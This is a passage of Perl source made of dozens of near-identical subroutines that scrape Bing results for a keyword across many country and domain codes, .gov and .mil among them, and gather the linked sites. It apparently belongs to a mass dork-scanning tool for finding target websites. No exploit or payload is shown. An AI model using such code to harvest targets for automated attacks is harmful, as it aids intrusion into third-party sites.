("http://www.bing.com/search?q=".uri_escape($key)."&cc=jp&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingJP/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCN() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cn&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCN/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingKR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=kr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingKR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub bingMX() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=mx&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingMX/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingAR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ar&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingAR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cl&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCL/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingAU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=au&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingAU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingAE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ae&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingAE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingAT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=at&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingAT/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCZ() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cz&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCZ/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingEU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=eu&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingEU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingHU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=hu&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingHU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingID() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=id&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingID/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingIL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=il&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingIL/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingIN() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=in&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingIN/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingINFO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=info&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingINFO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingIR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ir&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingIR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingMY() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=my&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingMY/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNET() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=net&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNET/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingORG() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=org&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingORG/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingPH() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ph&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingPH/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingPL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pl&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingPL/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingRO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ro&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingRO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingTH() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=th&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingTH/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingUA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ua&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingUA/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingUS() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=us&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingUS/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingSI() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=si&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingSI/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingBIZ() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=biz&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBIZ/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingXXX() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=xxx&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingXXX/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingTV() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=tv&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingTV/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCC() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cc&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCC/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingMIL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=mil&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCC/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingASIA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=asia&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingASIA/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNAME() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=name&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNAME/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingPRO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pro&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingPRO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingTRAVEL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=travel&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingTRAVEL/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingJOBS() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=jobs&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingJOBS/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingMOBI() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=mobi&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingMOBI/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingAERO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=aero&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingAERO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCAT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cat&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCAT/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCOOP() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=coop&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCOOP/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingEDU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=edu&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingEDU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingGOV() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=gov&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingGOV/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingBO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=bo&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingBA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ba&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBA/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingBW() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=bw&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBW/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingBG() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=bg&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBG/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=co&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingHR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=hr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingHR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingDO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=do&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingDO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingEC() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ec&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingEC/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingGR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=gr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingGR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingHN() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=hn&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingHN/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingHK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=hk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingHK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingIS() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=is&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingIS/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingIE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ie&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingIE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingKZ() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=kz&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingKZ/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingKE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ke&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingKE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingKG() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=kg&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingKG/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingLV() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=lv&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingLV/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingLY() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ly&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingLY/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingLT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=lt&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingLT/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingLU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=lu&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingLU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingMA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ma&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingMA/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNP() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=np&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNP/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingPK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingPK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingPR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingPR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingSG() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=sg&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingSG/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingSK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=sk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingSK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingZA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=za&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingZA/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingLK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=lk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingLK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingTW() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=tw&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingTW/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingTR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=tr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingTR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingVE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = 